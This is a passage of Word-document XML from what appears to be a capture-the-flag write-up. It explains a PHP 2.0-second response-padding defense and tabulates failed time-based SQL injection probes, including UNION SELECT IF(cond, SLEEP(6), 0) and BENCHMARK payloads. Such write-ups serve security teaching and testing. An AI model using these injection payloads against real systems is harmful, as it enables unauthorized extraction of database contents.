        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 The 2.0-Second Response Pad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100004"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The timing defense sits at the very top of the file:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 2: The shutdown pad every response pinned to 2.0 seconds</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
          <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="0e1712"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:left w:val="single" w:color="3ddbb5" w:sz="12" w:space="0"/>
              <w:bottom w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="200" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="5000" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$START = microtime(true);</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ob_start();</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">register_shutdown_function(function () use ($START) {</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    $remaining = 2.0 - (microtime(true) - $START);</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    if ($remaining &gt; 0) {</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        usleep((int)($remaining * 1000000));</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="20" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0" w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="cfe9d6"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}); // no timing attack!!</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A shutdown function measures how long the request actually took and, if the script finished early, sleeps for the remainder pinning total response time at 2.0 seconds no matter what the query did. Any sub-2-second timing oracle (a conditional </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, a small </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BENCHMARK()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> burn, or plain boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> latency noise) is erased before the bytes ever leave the server. Because the pad runs in a shutdown function, it even executes after a fatal error, which is why every request in this challenge successful or catastrophic takes the same wall-clock time.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Critically, the mechanism is one-directional: it can only add time, never truncate it. A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request that genuinely took longer than 2.0 seconds would still be visibly slower to the attacker. That asymmetry is exactly what stage one of the testing probed and exactly what the second, invisible defense layer closed, as the next chapter documents.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="742"/>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="180" w:before="380" w:line="380" w:lineRule="atLeast"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:bookmarkStart w:id="100005" w:name="_Toc100005"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0f2e24"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Dead Ends: Killing the Timing Channel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="100005"/>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The obvious plan was to exploit the pad's one-directionality. If the pad only pads upward, then a boolean oracle such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">0 UNION SELECT IF(cond, SLEEP(6), 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> should separate cleanly into roughly 2 seconds for false and roughly 6 seconds for true. Against the live instance, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nothing separated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Every duration payload came back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dead-flat at approximately 2.21 seconds 2.0 seconds of designed plus-measured latency with about 200 ms of network and processing overhead which meant something behind PHP was killing statements that crossed the 2.0-second mark. The killed query made </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">query()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> return false, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="175443"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">die()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> branch fired, and the pad absorbed the rest.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="140" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3 records the full probe matrix measured against the live instance. The pattern is unambiguous: the channel did not degrade with payload size or cleverness, it simply did not exist.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="true"/>
        <w:pBdr/>
        <w:spacing w:after="90" w:before="160" w:line="312" w:lineRule="auto"/>
        <w:ind/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1e5c49"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 3: Timing payload matrix everything flatlines at ~2.2 s</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="2a7a65" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="c5d8d0" w:sz="1" w:space="0"/>
          <w:insideV w:val="none" w:color="ffffff" w:sz="0" w:space="0"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload family</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="800" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Observed</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="2a7a65"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1500" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Verdict</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SLEEP(1)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">~2.0 s (padded)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.21 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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no info - clamped by pad</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SLEEP(3) ... SLEEP(18)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3-18 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.21 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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killed by statement timeout</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">BENCHMARK(2e8, MD5('a'))</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">~6-10 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.22 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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killed by statement timeout</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IF(cond, SLEEP(6), 0)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 s vs 6 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.21 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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oracle dead</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">... FOR UPDATE</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">read-only exemption</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.21 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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exemption not honored</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Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="175443"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FOR SHARE / LOCK IN SHARE MODE</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="ffffff"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="120" w:type="dxa"/>
              <w:top w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1200" w:type="pct"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:line="276" w:lineRule="atLeast"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">legacy locking bypass</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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2.22 s</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>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same</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
